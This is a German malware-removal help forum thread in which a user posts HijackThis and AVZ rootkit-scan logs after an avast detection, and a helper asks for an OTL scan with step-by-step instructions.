O9 - Extra button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ6.5\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ6.5\ICQ.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://download.divx.com/player/DivXBrowserPlugin.cab
O16 - DPF: {74DBCB52-F298-4110-951D-AD2FF67BC8AB} (NVIDIA Smart Scan) - http://www.nvidia.com/content/DriverDownload/nforce/NvidiaSmartScan.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O20 - AppInit_DLLs: winmm.dll
O23 - Service: Adobe Version Cue CS3 {de_DE} (Adobe Version Cue CS3) - Adobe Systems Incorporated - C:\Programme\Gemeinsame Dateien\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe
O23 - Service: Avira AntiVir Planer (AntiVirSchedulerService) - Avira GmbH - C:\Programme\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir Desktop\avguard.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Programme\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Programme\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Programme\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Programme\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Programme\Gemeinsame Dateien\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Programme\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Programme\Sygate\SPF\smc.exe

--
End of file - 8138 bytes

anti-malware läuft gerade und davor hat sich avast mit Win32:Kates-G gemeldet

worin liegt eigentlich der unterschied:
-ob ich von cd boote...
-oder wenn ich die platte in anderen pc hänge, und die tools vom anderen windows über die platte fliegen lasse ??

und konntest du was in meinen avz-logs erkennen ???

hier die log von avz von deinem zweiten script... hast mich jut erschrocken, mit der reboot zeile.. hatte ich garnicht gelesen und dachte gerade was weiß ich was :D da ich hier 20sachen gleichzeitig mache bzw machte ...:balla:

Zitat:

Creating archive of files from Quarantine
Creating archive of files from Quarantine - complete
Script error: Not enough actual parameters, position [7:16]
1.1 Searching for user-mode API hooks
Analysis: kernel32.dll, export table found in section .text
Analysis: ntdll.dll, export table found in section .text
Analysis: user32.dll, export table found in section .text
Analysis: advapi32.dll, export table found in section .text
Analysis: ws2_32.dll, export table found in section .text
Analysis: wininet.dll, export table found in section .text
Analysis: rasapi32.dll, export table found in section .text
Analysis: urlmon.dll, export table found in section .text
Analysis: netapi32.dll, export table found in section .text
1.2 Searching for kernel-mode API hooks
Driver loaded successfully
SDT found (RVA=07B180)
Kernel ntkrnlpa.exe found in memory at address 804D7000
SDT = 80552180
KiST = 80501030 (284)
Function NtAllocateVirtualMemory (11) intercepted (8059C910->B72B5B30), hook C:\WINDOWS\system32\drivers\wpsdrvnt.sys, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtClose (19) intercepted (805B0714->B4BCD6B8), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtCreateKey (29) intercepted (80618BD2->B4BCD574), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtCreateThread (35) intercepted (805C5AD0->B87FA6FC), hook not defined
>>> Function restored successfully !
>>> Hook code blocked
Function NtDeleteKey (3F) intercepted (80619062->B87FA70B), hook not defined
>>> Function restored successfully !
>>> Hook code blocked
Function NtDeleteValueKey (41) intercepted (80619232->B4BCDA52), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtDuplicateObject (44) intercepted (805B21F0->B4BCD14C), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtEnumerateKey (47) intercepted (80619412->B7ECDDA4), hook spkb.sys
>>> Function restored successfully !
>>> Hook code blocked
Function NtEnumerateValueKey (49) intercepted (8061967C->B7ECE132), hook spkb.sys
>>> Function restored successfully !
>>> Hook code blocked
Function NtLoadKey (62) intercepted (8061A902->B87FA71A), hook not defined
>>> Function restored successfully !
>>> Hook code blocked
Function NtMapViewOfSection (6C) intercepted (805A5F5A->B72B5470), hook C:\WINDOWS\system32\drivers\wpsdrvnt.sys, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtOpenKey (77) intercepted (80619F68->B4BCD64E), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtOpenProcess (7A) intercepted (805BFB78->B4BCD08C), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtOpenThread (80) intercepted (805BFE04->B4BCD0F0), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtProtectVirtualMemory (89) intercepted (805AC4E2->B72B5C50), hook C:\WINDOWS\system32\drivers\wpsdrvnt.sys, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtQueryKey (A0) intercepted (8061A28C->B7ECE20A), hook spkb.sys
>>> Function restored successfully !
>>> Hook code blocked
Function NtQueryValueKey (B1) intercepted (80616C8C->B4BCD76E), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtReplaceKey (C1) intercepted (8061A7B2->B87FA724), hook not defined
>>> Function restored successfully !
>>> Hook code blocked
Function NtRestoreKey (CC) intercepted (80616FDA->B4BCD72E), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtSetValueKey (F7) intercepted (80617292->B4BCD8AE), hook C:\WINDOWS\System32\Drivers\aswSP.SYS, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtShutdownSystem (F9) intercepted (8060786E->B72B5990), hook C:\WINDOWS\system32\drivers\wpsdrvnt.sys, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Function NtTerminateProcess (101) intercepted (805C74C8->B87FA6F7), hook not defined
>>> Function restored successfully !
>>> Hook code blocked
Function NtWriteVirtualMemory (115) intercepted (805A82F6->B72B5D60), hook C:\WINDOWS\system32\drivers\wpsdrvnt.sys, driver recognized as trusted
>>> Function restored successfully !
>>> Hook code blocked
Functions checked: 284, intercepted: 23, restored: 23
1.3 Checking IDT and SYSENTER
Analyzing CPU 1
CmpCallCallBacks = 0008802E
Disable callback OK
Checking IDT and SYSENTER - complete
1.4 Searching for masking processes and drivers
Checking not performed: extended monitoring driver (AVZPM) is not installed
Driver loaded successfully
1.5 Checking IRP handlers
\FileSystem\ntfs[IRP_MJ_CREATE] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_CLOSE] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_WRITE] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_QUERY_INFORMATION] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_SET_INFORMATION] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_QUERY_EA] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_SET_EA] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_QUERY_VOLUME_INFORMATION] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_SET_VOLUME_INFORMATION] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_DIRECTORY_CONTROL] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_FILE_SYSTEM_CONTROL] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_DEVICE_CONTROL] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_LOCK_CONTROL] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_QUERY_SECURITY] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_SET_SECURITY] = 89D601F8 -> hook not defined
\FileSystem\ntfs[IRP_MJ_PNP] = 89D601F8 -> hook not defined
Checking - complete
Delete file:C:\PROGRA~1\INTERN~1\..\lohe.old 0yAAAAAAAA
>>>To delete the file C:\PROGRA~1\INTERN~1\..\lohe.old 0yAAAAAAAA reboot is required
Removing traces of deleted files...

*micheinmisch*

Kannst Du RSIT oder OTL ausführen? Logfiles bitte hier anhängen.

Systemscan mit OTL

Lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop

Doppelklick auf die OTL.exe
Vista User: Rechtsklick auf die OTL.exe und "als Administrator ausführen" wählen
Oben findest Du ein Kästchen mit Output. Wähle bitte Minimal Output
Unter Extra Registry, wähle bitte Use SafeList
Klicke nun auf Run Scan links oben
Wenn der Scan beendet wurde werden 2 Logfiles erstellt
Poste die Logfiles hier in den Thread.

Zitat:

*micheinmisch*

thnx :daumenhoc

meine logs sind im anhang

der 'unzufriedene kunde' hat sich entschieden board-urlaub zu nehmen :)